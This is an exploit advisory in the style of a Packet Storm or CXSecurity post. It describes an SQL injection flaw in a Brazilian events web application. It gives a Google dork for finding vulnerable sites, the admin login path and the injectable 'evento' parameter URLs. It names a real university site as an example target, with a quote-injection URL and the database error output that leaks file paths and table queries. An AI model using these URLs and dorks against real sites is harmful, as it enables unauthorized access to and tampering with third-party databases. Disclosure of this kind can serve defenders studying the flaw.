SethComunicacao FreshDesk Brazil SQL Injection

1. ###################################################################
2.  
3. # Exploit Title : SethComunicacao FreshDesk Brazil SQL Injection
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 25/04/2019
7. # Vendor Homepages :
8. seth.freshdesk.com/support/home
9. sethcomunicacao.com
10. # Tested On : Windows and Linux
11. # Category : WebApps
12. # Exploit Risk : Medium
13. # Google Dorks : Faculdade Jesuíta Portal FAJE site:edu.br
14. # Vulnerability Type : CWE-89 [ Improper Neutralization of
15. Special Elements used in an SQL Command ('SQL Injection') ]
16. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
17. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
18. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
19.  
20. ###################################################################
21.  
22. # Impact :
23. ***********
24. SethComunicacao FreshDesk Brazil is prone to an SQL-injection vulnerability because
25.  
26. it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
27.  
28. Exploiting this issue could allow an attacker to compromise the application, access or
29.  
30. modify data, or exploit latent vulnerabilities in the underlying database.
31.  
32. A remote attacker can send a specially crafted request to the vulnerable application and
33.  
34. execute arbitrary SQL commands in application`s database. Further exploitation of this
35.  
36. vulnerability may result in unauthorized data manipulation.
37.  
38. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
39.  
40. ###################################################################
41.  
42. # Admin Panel Login Path :
43. ************************
44. /webtop/login.php
45.  
46. # SQL Injection Exploit :
47. **********************
48. /eventos/cadastro/index.php?evento=[SQL Injection]
49.  
50. /eventos/index.php?%2520%2520pagina=grupo_conteudo&tela=
51. [ID-NUMBER]&usuarioparoquia=&subtela=&evento=[SQL Injection]
52.  
53. ###################################################################
54.  
55. # Example Vulnerable Sites :
56. *************************
57. [+] faculdadejesuita.edu.br/eventos/cadastro/index.php?evento=1%27
58.  
59. ###################################################################
60.  
61. # Example SQL Database Error :
62. ****************************
63. Erro no banco de dados You have an error in your SQL syntax; check the manual
64. that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
65.  
66. Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, null given in
67. /home/fajee520/public_html/faculdadejesuita/eventos/cadastro/index.php on line 192
68.  
69. SELECT * FROM tbeve_hotsite WHERE evento_id = 1'
70.  
71. SELECT * FROM tbeve_rede where status = 1 AND evento_id = 1'
72.  
73. SELECT * FROM tbeve_contato2 WHERE evento_id = 1'
74.  
75. SELECT * FROM tbeve_participante_personalizacao where evento_id = 1'
76.  
77. SELECT * FROM tbeve_evento WHERE id = 1'
78.  
79. ###################################################################
80.  
81. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
82.  
83. ###################################################################